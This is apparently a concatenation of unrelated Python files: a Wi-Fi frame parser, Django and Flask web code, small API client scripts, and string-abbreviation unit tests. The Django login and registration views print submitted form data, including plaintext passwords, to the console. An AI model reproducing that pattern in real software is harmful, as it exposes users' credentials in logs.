"""
"""
Management.__init__(self, frame, no_rtap)
idx = 0
self.ta = self.ra = self.bssid = None
self.seq_num = self.frag_num = None
self.timestamp = self.interval = None
# fixed capability fields
self.ess = self.ibss = None
self.privacy = None
self.priv = self.short_pre = self.pbcc = self.chan_agility = None
self.spec_man = self.short_slot = self.apsd = self.radio_meas = None
self.dss_ofdm = self.del_back = self.imm_back = None
seq_idx, _, _, self.ta, self.ra, _, self.bssid = self.strip_mac_addrs()
idx = seq_idx
self.seq_num, self.frag_num = self.strip_seq_cntrl(idx)
idx += 2
payload = self._packet[idx:idx + 12]
timestamp, interval, fixed_capabils = self.strip_fixed_params(payload)
if all([timestamp, interval, fixed_capabils]):
self.timestamp = timestamp
self.interval = interval
self.set_fixed_capabils(fixed_capabils)
idx += 12
else:
logging.error("failed to parse fixed parameters")
return
if idx < len(self._packet):
self._raw_tagged_params = self._packet[idx:]
is_out_bound, tagged_params = self.parse_tagged_params(self._raw_tagged_params)
if len(tagged_params):
self.tagged_params = tagged_params
if is_out_bound:
logging.error("tag_len header not matched with raw byte counts")
class ProbeReq(Management):
"""Probe Request (type: 0, subtype:4)"""
_sfields_ = [('ra', ctypes.c_char_p), # receiver address
('ta', ctypes.c_char_p), # transmitter address
('bssid', ctypes.c_char_p), # basic service set identifier
('frag_num', ctypes.c_uint), # fragment number
('seq_num', ctypes.c_uint), # sequence number
('tagged_params', list)] # tagged parameters
_s_shark_ = {'wlan.ra': 'ra',
'wlan.ta': 'ta',
'wlan.bssid': 'bssid',
'wlan.frag': 'frag_num',
'wlan.seq': 'seq_num',
'wlan_mgt.tagged.all': 'tagged_params'}
def __init__(self, frame, no_rtap=False):
"""
"""
Management.__init__(self, frame, no_rtap)
idx = 0
self.ta = self.ra = self.bssid = None
self.seq_num = self.frag_num = None
seq_idx, _, _, self.ta, self.ra, _, self.bssid = self.strip_mac_addrs()
idx = seq_idx
self.seq_num, self.frag_num = self.strip_seq_cntrl(idx)
idx += 2
if idx < len(self._packet):
self._raw_tagged_params = self._packet[idx:]
is_out_bound, tagged_params = self.parse_tagged_params(self._raw_tagged_params)
if len(tagged_params):
self.tagged_params = tagged_params
if is_out_bound:
logging.error("tag_len header not matched with raw byte counts")
class Beacon(Management):
"""Beacon (type: 0, subtype: 0)"""
_sfields_ = [('ra', ctypes.c_char_p), # receiver address
('ta', ctypes.c_char_p), # transmitter address
('bssid', ctypes.c_char_p), # basic service set identifier
('frag_num', ctypes.c_uint), # fragment number
('seq_num', ctypes.c_uint), # sequence number
('timestamp', ctypes.c_uint64), # timestamp
('interval', ctypes.c_uint), # interval
('tagged_params', list)] # tagged parameters
# Wireshark syntax conjugates of fields in object (subfield shark)
_s_shark_ = {'wlan.ta': 'ta',
'wlan.ra': 'ra',
'wlan.bssid': 'bssid',
'wlan.frag': 'frag_num',
'wlan.seq': 'seq_num',
'wlan_mgt.fixed.timestamp': 'timestamp',
'wlan_mgt.fixed.beacon': 'interval',
'wlan_mgt.tagged.all': 'tagged_params'}
_sfields_ += Management._capabilities_
_s_shark_.update(Management._scapabilities_)
def __init__(self, frame, no_rtap=False):
"""Constructor method.
:frame: ctypes.Structure
"""
Management.__init__(self, frame, no_rtap)
idx = 0
self.timestamp = self.interval = None
self.ta = self.ra = self.bssid = None
self.seq_num = self.frag_num = None
# fixed capability fields
self.ess = self.ibss = None
self.privacy = None
self.priv = self.short_preamble = self.pbcc = self.chan_agility = None
self.spec_man = self.short_slot = self.apsd = self.radio_meas = None
self.dss_ofdm = self.del_back = self.imm_back = None
seq_idx, _, _, self.ta, self.ra, _, self.bssid = self.strip_mac_addrs()
idx = seq_idx
self.seq_num, self.frag_num = self.strip_seq_cntrl(idx)
idx += 2
payload = self._packet[idx:idx + 12]
timestamp, interval, fixed_capabils = self.strip_fixed_params(payload)
if all([timestamp, interval, fixed_capabils]):
self.timestamp = timestamp
self.interval = interval
self.set_fixed_capabils(fixed_capabils)
idx += 12
else:
logging.warning("failed to parse fixed parameters")
return
if idx < len(self._packet):
self._raw_tagged_params = self._packet[idx:]
is_out_bound, tagged_params = self.parse_tagged_params(self._raw_tagged_params)
if len(tagged_params):
self.tagged_params = tagged_params
if is_out_bound:
logging.warning("tag_len header not matched with raw byte counts")
def __str__(self):
frame = "%s from %s (tstamp: %d, interval: %d)"
frame = frame % (self.name, self.bssid, self.timestamp, self.interval)
return frame
class Control(Wifi):
"""Control Frames (type: 1)"""
def __init__(self, frame, no_rtap=False):
"""Constructor method.
:frame: ctypes.Structure
"""
Wifi.__init__(self, frame, no_rtap)
def __str__(self):
return self.name
class RTS(Control):
"""Request to Send Frame (type: 1, subtype: 1)"""
_sfields_ = [('ta', ctypes.c_char_p), # transmitter address
('ra', ctypes.c_char_p)] # receiver address
# Wireshark syntax conjugates of fields in object (subfield shark)
_s_shark_ = {'wlan.ta': 'ta',
'wlan.ra': 'ra'}
def __init__(self, frame, no_rtap=False):
"""Constructor method.
:frame: ctypes.Structure
"""
Control.__init__(self, frame, no_rtap)
(ra_mac, ta_mac) = struct.unpack('!6s6s', self._packet[4:16])
self.ra = Wifi.get_mac_addr(ra_mac)
self.ta = Wifi.get_mac_addr(ta_mac)
def __str__(self):
frame = '%s from %s to %s (duration: %d us)'
frame = frame % (self.name, self.ta, self.ra, self.duration)
return frame
class CTS(Control):
"""Clear to Send Frame (type: 1, subtype: 2)"""
_sfields_ = [('ra', ctypes.c_char_p)] # receiver address -> wlan.ra
# Wireshark syntax conjugates of fields in object (subfield shark)
_s_shark_ = {'wlan.ra': 'ra'}
def __init__(self, frame, no_rtap=False):
"""Constructor method.
:frame: ctypes.Structure
"""
Control.__init__(self, frame, no_rtap)
ra_mac = struct.unpack('!6s', self._packet[4:10])[0]
self.ra = Wifi.get_mac_addr(ra_mac)
def __str__(self):
frame = '%s to %s (duration: %d us)'
frame = frame % (self.name, self.ra, self.duration)
return frame
class BACK(Control):
"""Block Acknowledgement Frame (type: 1, subtype: 9)"""
_sfields_ = [('ra', ctypes.c_char_p), # receiver address
('ta', ctypes.c_char_p), # transmitter address
('ackpolicy', ctypes.c_bool), # acknowledgement policy
('multitid', ctypes.c_bool), # multiple traffic identifier
('ssc_frag', ctypes.c_uint), # starting sequence number fragment
('ssc_seq', ctypes.c_uint), # starting sequence number
('bitmap_str', ctypes.c_char_p), # bitmap string -> in wlan.ba.bm
('acked_seqs', list)] # acknowledged sequences -> in wlan.ba.bm and wlan_mgt.fixed.ssc.sequence
# Wireshark syntax conjugates of fields in object (subfield shark)
_s_shark_ = {'wlan.ra': 'ra',
'wlan.ta': 'ta',
'wlan.ba.control.ackpolicy': 'ackpolicy',
'wlan.ba.control.multitid': 'multitid',
'wlan_mgt.fixed.ssc.fragment': 'ssc_frag',
'wlan_mgt.ssc.sequence': 'ssc_seq'}
def __init__(self, frame, no_rtap=False):
"""Constructor method.
:frame: ctypes.Structure
"""
Control.__init__(self, frame, no_rtap)
(ra_mac, ta_mac) = struct.unpack('!6s6s', self._packet[4:16])
self.ra = self.ta = None
self.ackpolicy = self.multitid = None
self.ssc_frag = self.ssc_seq = None
self.bitmap_str = None
self.acked_seqs = []
self.ra = Wifi.get_mac_addr(ra_mac)
self.ta = Wifi.get_mac_addr(ta_mac)
idx = 16
payload = self._packet[idx:idx + 2]
self.ackpolicy, self.multitid = BACK.strip_cntrl(payload)
idx += 2
payload = self._packet[idx:idx + 2]
self.ssc_seq, self.ssc_frag = BACK.strip_ssc(payload)
idx += 2
payload = self._packet[idx:idx + 8]
self.bitmap_str = BACK.strip_bitmap_str(payload)
idx += 8
self.acked_seqs = BACK.extract_acked_seqs(self.bitmap_str, self.ssc_seq)
def get_shark_field(self, fields):
"""
:fields: str[]
"""
out = super(BACK, self).get_shark_field(fields)
out.update({'acked_seqs': self.acked_seqs,
'bitmap_str': self.bitmap_str})
return out
@staticmethod
def strip_cntrl(payload):
"""strip(2 byte) wlan.ba.control
:payload: ctypes.structure
:return: int
ackpolicy
:return: int
multitid (tid: traffic indicator)
"""
cntrl = struct.unpack('H', payload)[0]
cntrl_bits = format(cntrl, '016b')[::-1]
ackpolicy = int(cntrl_bits[0])
multitid = int(cntrl_bits[1])
return ackpolicy, multitid
@staticmethod
def strip_ssc(payload):
"""strip(2 byte) wlan_mgt.fixed.ssc
:payload: ctypes.structure
:return: int
ssc_seq (starting sequence control sequence)
:return: int
ssc_frag (starting sequence control fragment number)
"""
ssc = struct.unpack('H', payload)[0]
ssc_seq = ssc >> 4
ssc_frag = ssc & 0x000f
return ssc_seq, ssc_frag
@staticmethod
def strip_bitmap_str(payload):
"""strip(8 byte) wlan.ba.bm
:payload: ctypes.structure
:return: str
bitmap
"""
bitmap = struct.unpack('BBBBBBBB', payload)
bitmap_str = ''
for elem in bitmap:
bitmap_str += format(elem, '08b')[::-1]
return bitmap_str
@staticmethod
def extract_acked_seqs(bitmap, ssc_seq):
"""extracts acknowledged sequences from bitmap and
starting sequence number.
:bitmap: str
:ssc_seq: int
:return: int[]
acknowledged sequence numbers
"""
acked_seqs = []
for idx, val in enumerate(bitmap):
if int(val) == 1:
seq = (ssc_seq + idx) % 4096
acked_seqs.append(seq)
return acked_seqs
def __str__(self):
frame = '%s from %s to %s (starting seq: %d, num_acked: %d)'
frame = frame % (self.name, self.ta, self.ra,
self.ssc_seq, len(self.acked_seqs))
return frame
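# Worked example for the bitmap decoding above (illustrative only): the bitmap string is
# already bit-reversed per byte, so with '1010' and a starting sequence number of 100 the
# set positions 0 and 2 yield sequences 100 and 102 (modulo 4096).
#
#     BACK.extract_acked_seqs('1010', 100)   # -> [100, 102]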
class Unknown(Wifi):
"""
unidentified packet
"""
def __init__(self, frame, no_rtap):
Wifi.__init__(self, frame, no_rtap)
self.name = "Unkown"
|
py | 1a3f89a636c8e244e089013340c4d435cdebe456 | from django.contrib.auth import authenticate, login, get_user_model
from django.shortcuts import render, redirect
from django.http import HttpResponse
from .forms import ContactForm, LoginForm, RegisterForm
def home_page(request):
context = {
"title": "Hello, I am Anil Choudhary.",
"content": "Welcome to the Homepage.",
}
if request.user.is_authenticated:
context['premium_content'] = "you are awesome"
return render(request, "home_page.html", context)
def about_page(request):
context = {
"title": "About page",
"content": "Welcome to the about page"
}
return render(request, "home_page.html", context)
def contact_page(request):
contact_form = ContactForm(request.POST or None)
context = {
"title": "Contact page",
"content": "Welcome to the contact page",
"form": contact_form
}
if contact_form.is_valid():
print(contact_form.cleaned_data)
# if request.method == "POST":
# # print(request.POST)
# print(request.POST.get('fullname'))
# print(request.POST.get('email'))
# print(request.POST.get('content'))
return render(request, "contact/view.html", context)
def login_page(request):
form = LoginForm(request.POST or None)
context = {
"form": form
}
print("user logged in?")
print(request.user.is_authenticated)
if form.is_valid():
print(form.cleaned_data)
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user = authenticate(request, username=username, password=password)
print(request.user.is_authenticated)
if user is not None:
print(request.user.is_authenticated)
login(request, user)
# context['form'] = LoginForm()
return redirect("/")
else:
print("Please, register with us")
return render(request, "auth/login.html", context)
User = get_user_model()
def register_page(request):
form = RegisterForm(request.POST or None)
context = {
'form': form,
}
if form.is_valid():
print(form.cleaned_data)
username = form.cleaned_data['username']
email = form.cleaned_data['email']
password = form.cleaned_data['password']
new_user = User.objects.create_user(username, email, password)
print(new_user)
return render(request, "auth/register.html", context)
def shop_page(request):
context = {
"title": "Shop page",
"content": "Welcome to the shop page"
}
return render(request, "home_page.html", context)
|
py | 1a3f8b275037cde1c338fbf02cdda190b073025a | import json
import pandas as pd
import numpy as np
import requests
from cleanup import bubi_coredata
try:
from BeautifulSoup import BeautifulSoup
except ImportError:
from bs4 import BeautifulSoup
# fetches the collection id for a collection entry
def get_ezb_id(collection):
    # if no collection is given, return an empty string
if collection == '':
return ''
    # build the URL to the ezb
url = 'https://ezb.ur.de/api/collections/' + collection
    # fetch the page
request = requests.get(url)
    # if the request was successful (status = 200), read out the values
if request.status_code == 200:
        # parse the page content (= request.content) with BeautifulSoup
        # https://www.crummy.com/software/BeautifulSoup/bs4/doc/
parsed_html = BeautifulSoup(request.content, features="lxml")
        # read the JSON-formatted content from the p tag. Since it sometimes contains notes instead,
        # wrap the whole thing in a try/except block. If the content cannot be parsed as JSON, an
        # empty string is returned. Otherwise the "coll_id" field is read from the JSON part and returned.
try:
json_object = json.loads(parsed_html.find("p").get_text())
return json_object['coll_id']
except:
return ''
    # if the page request was not successful (status is not 200), an empty string is returned.
else:
return ""
def collect_data(filename):
    # the path to the original file, in this case in the subfolder data/input, relative to the location of this file
path = 'data/input/{}'.format(filename)
    # read the file, making sure that the package:collection column is read in as text
df = pd.read_excel(path, dtype={'package:collection': str, 'zdb_id': str})
    # replace all "Not a number" (nan) values with empty strings
df = df.replace(np.nan, "", regex=True)
    # prepare the list of rows to be written
extended_rows = []
    # iterate over all rows
for index, row in df.iterrows():
        # report the current progress on the command line for every hundredth entry
if index % 100 == 0:
print("processing line {} of {}".format(index, len(df)))
        # query the ezb collection id by calling the function defined above
ezb_collection_id = get_ezb_id(row['package:collection'])
        # store it as a new value in the "collection_id" column
row['collection_id'] = ezb_collection_id
        # append this row to the list of rows to be written
extended_rows.append(row)
    # convert the list of rows to be written into a pandas DataFrame
output_df = pd.DataFrame(extended_rows)
    # write the DataFrame to a file. It has the same name as the source file, prefixed with "out_",
    # and is located in the data/output folder relative to this file
output_df.to_excel('data/output/out_{}'.format(filename))
# standard Python entry point for the script
if __name__ == '__main__':
    # the name of the file to be processed, located in the data/input folder relative to this file
filename = 'Grunddaten_Essen'
    # run the core data transformation and collect the data
bubi_coredata.transform_coredata(filename, 'E')
|
py | 1a3f8c0522f5ad324f480da05570d126d4afa613 | from ibm_cloud_security_advisor import NotificationsApiV1
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
authenticator = IAMAuthenticator(
apikey='abc')
notifications_service = NotificationsApiV1(authenticator=authenticator)
notifications_service.set_service_url("https://us-south.secadvisor.cloud.ibm.com/notifications")
data = {
"name": "sdk_test_notification1",
"description": "test1 description",
"type": "Webhook",
"endpoint": "http://test.com",
"enabled": True,
"severity": [
"high",
"medium",
"low",
"critical"
],
"alert_source": [
{
"provider_name": "VA",
"finding_types": [
"ALL"
]
},
{
"provider_name": "CERT",
"finding_types": [
"ALL"
]
}
]
}
response = notifications_service.create_notification_channel(
account_id="abc",
**data
)
print(response)
|
py | 1a3f8c3bd14cf4a4e406c5bf30d764108a4911e2 | #! /usr/bin/env python
from os import environ
from insightlab import Insight, InsightObjects
TOKEN = environ.get("INSIGHT_TOKEN", "")
## Set login
i = Insight.API(TOKEN, "4")
## Load the object
my_server = i.load("IDLAB-5709")
print(f"Current hostname: {my_server.attribute_value_by_name('Hostname')}")
## Find the attribute's id
id = my_server.attribute_id_by_name("Hostname")
## Create the attribute object and add the value
attr = InsightObjects.Attributes(id)
attr.add_value("new_hostname.test.idlab.org")
## Update the attribute's value
i.update_attribute(my_server.id, attr)
# Reload the object
my_server = i.load("IDLAB-5709")
print(f"New hostname: {my_server.attribute_value_by_name('Hostname')}")
input("Press Enter to continue...")
# Reset to original
i.update_attribute(my_server.id, id, ["test.server.idlab.org"])
|
py | 1a3f8cb507513d44067eec796322a3c7cdca46da | # coding=utf-8
# Copyright 2018-2020 EVA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from src.parser.statement import AbstractStatement
from src.parser.types import StatementType
from src.parser.table_ref import TableRef
from typing import List
from src.parser.types import ParserColumnDataType
class ColumnConstraintInformation:
def __init__(self):
self.nullable = False
self.default_value = None
self.primary = False
self.unique = False
class ColumnDefinition:
def __init__(self, col_name: str,
col_type: ParserColumnDataType, col_dim: List[int],
cci: ColumnConstraintInformation = None):
self._name = col_name
self._type = col_type
self._dimension = col_dim
        # column constraint info
if cci is not None:
self._unique_column_constraint = cci.unique
self._nullable = cci.nullable
self._primary = cci.primary
self._default_value = cci.default_value
@property
def name(self):
return self._name
@property
def type(self):
return self._type
@property
def dimension(self):
return self._dimension
def __str__(self):
return '{} {} {}'.format(self._name, self._type, self._dimension)
def __eq__(self, other):
if not isinstance(other, ColumnDefinition):
# don't attempt to compare against unrelated types
return NotImplemented
return self.name == other.name and \
self.type == other.type and self.dimension == other.dimension
class CreateTableStatement(AbstractStatement):
"""Create Table Statement constructed after parsing the input query
Attributes:
TableRef: table reference in the create table statement
ColumnList: list of columns
"""
def __init__(self,
table_ref: TableRef,
if_not_exists: bool,
column_list: List[ColumnDefinition] = None):
super().__init__(StatementType.CREATE)
self._table_ref = table_ref
self._if_not_exists = if_not_exists
self._column_list = column_list
def __str__(self) -> str:
print_str = "CREATE TABLE {} ({}) ".format(self._table_ref,
self._if_not_exists)
return print_str
@property
def table_ref(self):
return self._table_ref
@property
def if_not_exists(self):
return self._if_not_exists
@property
def column_list(self):
return self._column_list
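# Illustrative usage sketch (hypothetical placeholder values, not part of the original module;
# table_ref and col_type are assumed to be a TableRef and a ParserColumnDataType instance):
#   columns = [ColumnDefinition('id', col_type, [1])]
#   stmt = CreateTableStatement(table_ref, if_not_exists=True, column_list=columns)
#   str(stmt)  # -> 'CREATE TABLE <table_ref> (True) '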
|
py | 1a3f8d02f27558dcd22c1f6e399f57f72a3eba4d | from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from config import config_options
from flask_bootstrap import Bootstrap
from flask_login import LoginManager
from flask_uploads import UploadSet,configure_uploads,IMAGES
from flask_mail import Mail
mail = Mail()
login_manager = LoginManager()
login_manager.session_protection = 'strong'
login_manager.login_view = 'auth.login'
bootstrap = Bootstrap()
db = SQLAlchemy()
photos = UploadSet('photos', IMAGES)
def create_app(config_name):
# Initializing application
app = Flask(__name__)
#creating the app configurations
app.config.from_object(config_options[config_name])
#Registering the Blueprint
from .main import main as main_blueprint
    app.register_blueprint(main_blueprint)
    # Initializing Flask extensions
bootstrap.init_app(app)
db.init_app(app)
login_manager.init_app(app)
from .auth import auth as auth_blueprint
app.register_blueprint(auth_blueprint,url_prefix = '/auth')
mail.init_app(app)
    # setting config
    # from .request import configure_request
    # configure_request(app)
#configure UploadSet
configure_uploads(app,photos)
#will add the views and the forms
from .main import views,error
return app
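# Example of how this factory is typically consumed from a run script or manage.py
# ('development' is an assumed key of config_options, not taken from this file):
#   app = create_app('development')
#   app.run()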
|
py | 1a3f8eb1e9eb121f82de09e971acfd8b927301c6 | from flask import Flask
from flask import render_template
app = Flask(__name__)
@app.route('/')
def index():
return render_template('index.html')
if __name__ == "__main__":
app.run(host="0.0.0.0", debug=True)
|
py | 1a3f90bbf02eac2145f98157c4f9340816ed14b8 | import mock
import contextlib
import locale
import unittest
from collections import defaultdict
from typing import Any
from publish import *
from unittestresults import get_test_results
from junit import parse_junit_xml_files
from test import d, n
from unittestresults import get_stats, UnitTestCase, ParseError
@contextlib.contextmanager
def temp_locale(encoding) -> Any:
old_locale = locale.getlocale()
locale.setlocale(locale.LC_ALL, encoding)
try:
res = yield
finally:
locale.setlocale(locale.LC_ALL, old_locale)
return res
errors = [ParseError('file', 'error', 1, 2)]
class PublishTest(unittest.TestCase):
old_locale = None
def test_abbreviate_characters(self):
# None string
self.assertIsNone(abbreviate(None, 1))
# 1 byte utf8 characters
self.assertEqual('', abbreviate('', 1))
self.assertEqual('…', abbreviate('…', 1))
self.assertEqual('ab', abbreviate('ab', 3))
self.assertEqual('ab', abbreviate('ab', 2))
self.assertEqual('…', abbreviate('ab', 1))
self.assertEqual('abc', abbreviate('abc', 4))
self.assertEqual('abc', abbreviate('abc', 3))
self.assertEqual('a…', abbreviate('abc', 2))
self.assertEqual('…', abbreviate('abc', 1))
self.assertEqual('abcd', abbreviate('abcd', 4))
self.assertEqual('a…d', abbreviate('abcd', 3))
self.assertEqual('a…', abbreviate('abcd', 2))
self.assertEqual('…', abbreviate('abcd', 1))
self.assertEqual('abcde', abbreviate('abcde', 5))
self.assertEqual('ab…e', abbreviate('abcde', 4))
self.assertEqual('a…e', abbreviate('abcde', 3))
self.assertEqual('a…', abbreviate('abcde', 2))
self.assertEqual('…', abbreviate('abcde', 1))
self.assertEqual('abcdef', abbreviate('abcdef', 6))
self.assertEqual('ab…ef', abbreviate('abcdef', 5))
self.assertEqual('ab…f', abbreviate('abcdef', 4))
self.assertEqual('a…f', abbreviate('abcdef', 3))
self.assertEqual('a…', abbreviate('abcdef', 2))
self.assertEqual('…', abbreviate('abcdef', 1))
self.assertEqual('abcdefg', abbreviate('abcdefg', 7))
self.assertEqual('abc…fg', abbreviate('abcdefg', 6))
self.assertEqual('ab…fg', abbreviate('abcdefg', 5))
self.assertEqual('ab…g', abbreviate('abcdefg', 4))
self.assertEqual('a…g', abbreviate('abcdefg', 3))
self.assertEqual('a…', abbreviate('abcdefg', 2))
self.assertEqual('…', abbreviate('abcdefg', 1))
self.assertEqual('abcdefgh', abbreviate('abcdefgh', 8))
self.assertEqual('abc…fgh', abbreviate('abcdefgh', 7))
self.assertEqual('abc…gh', abbreviate('abcdefgh', 6))
self.assertEqual('ab…gh', abbreviate('abcdefgh', 5))
self.assertEqual('ab…h', abbreviate('abcdefgh', 4))
self.assertEqual('a…h', abbreviate('abcdefgh', 3))
self.assertEqual('a…', abbreviate('abcdefgh', 2))
self.assertEqual('…', abbreviate('abcdefgh', 1))
self.assertEqual('abcdefghijklmnopqrstuvwxyz', abbreviate('abcdefghijklmnopqrstuvwxyz', 27))
self.assertEqual('abcdefghijklmnopqrstuvwxyz', abbreviate('abcdefghijklmnopqrstuvwxyz', 26))
self.assertEqual('abcdefghijkl…opqrstuvwxyz', abbreviate('abcdefghijklmnopqrstuvwxyz', 25))
# 2 bytes utf8 characters
self.assertEqual('»»»»»', abbreviate('»»»»»', 5))
self.assertEqual('»»…»', abbreviate('»»»»»', 4))
self.assertEqual('»…»', abbreviate('»»»»»', 3))
self.assertEqual('»…', abbreviate('»»»»»', 2))
self.assertEqual('…', abbreviate('»»»»»', 1))
self.assertEqual('»»»»»»', abbreviate('»»»»»»', 6))
self.assertEqual('»»…»»', abbreviate('»»»»»»', 5))
self.assertEqual('»»…»', abbreviate('»»»»»»', 4))
self.assertEqual('»…»', abbreviate('»»»»»»', 3))
self.assertEqual('»…', abbreviate('»»»»»»', 2))
self.assertEqual('…', abbreviate('»»»»»»', 1))
# 3 bytes utf8 characters
self.assertEqual('▊▋▌▍▎', abbreviate('▊▋▌▍▎', 5))
self.assertEqual('▊▋…▎', abbreviate('▊▋▌▍▎', 4))
self.assertEqual('▊…▎', abbreviate('▊▋▌▍▎', 3))
self.assertEqual('▊…', abbreviate('▊▋▌▍▎', 2))
self.assertEqual('…', abbreviate('▊▋▌▍▎', 1))
self.assertEqual('▊▋▌▍▎▏', abbreviate('▊▋▌▍▎▏', 6))
self.assertEqual('▊▋…▎▏', abbreviate('▊▋▌▍▎▏', 5))
self.assertEqual('▊▋…▏', abbreviate('▊▋▌▍▎▏', 4))
self.assertEqual('▊…▏', abbreviate('▊▋▌▍▎▏', 3))
self.assertEqual('▊…', abbreviate('▊▋▌▍▎▏', 2))
self.assertEqual('…', abbreviate('▊▋▌▍▎▏', 1))
# 4 bytes utf8 characters
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 27))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 26))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 25))
# mixed utf bytes: lengths=[1, 2, 3, 4, 1, 2, 3, 4]
self.assertEqual('a»▉𝒂a»▉𝒂', abbreviate('a»▉𝒂a»▉𝒂', 9))
self.assertEqual('a»▉𝒂a»▉𝒂', abbreviate('a»▉𝒂a»▉𝒂', 8))
self.assertEqual('a»▉…»▉𝒂', abbreviate('a»▉𝒂a»▉𝒂', 7))
self.assertEqual('a»▉…▉𝒂', abbreviate('a»▉𝒂a»▉𝒂', 6))
self.assertEqual('a»…▉𝒂', abbreviate('a»▉𝒂a»▉𝒂', 5))
self.assertEqual('a»…𝒂', abbreviate('a»▉𝒂a»▉𝒂', 4))
self.assertEqual('a…𝒂', abbreviate('a»▉𝒂a»▉𝒂', 3))
self.assertEqual('a…', abbreviate('a»▉𝒂a»▉𝒂', 2))
self.assertEqual('…', abbreviate('a»▉𝒂a»▉𝒂', 1))
self.assertEqual('a»▉𝒂a»▉', abbreviate('a»▉𝒂a»▉', 8))
self.assertEqual('a»▉𝒂a»▉', abbreviate('a»▉𝒂a»▉', 7))
self.assertEqual('a»▉…»▉', abbreviate('a»▉𝒂a»▉', 6))
self.assertEqual('a»…»▉', abbreviate('a»▉𝒂a»▉', 5))
self.assertEqual('a»…▉', abbreviate('a»▉𝒂a»▉', 4))
self.assertEqual('a…▉', abbreviate('a»▉𝒂a»▉', 3))
self.assertEqual('a…', abbreviate('a»▉𝒂a»▉', 2))
self.assertEqual('…', abbreviate('a»▉𝒂a»▉', 1))
# invalid abbreviation lengths
self.assertRaises(ValueError, lambda: abbreviate('abc', 0))
self.assertRaises(ValueError, lambda: abbreviate('abc', -1))
def test_abbreviate_bytes(self):
# None string
self.assertIsNone(abbreviate_bytes(None, 3))
# even number of characters
# 4 bytes utf characters
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 105))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 104))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 103))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 102))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 101))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 100))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 99))
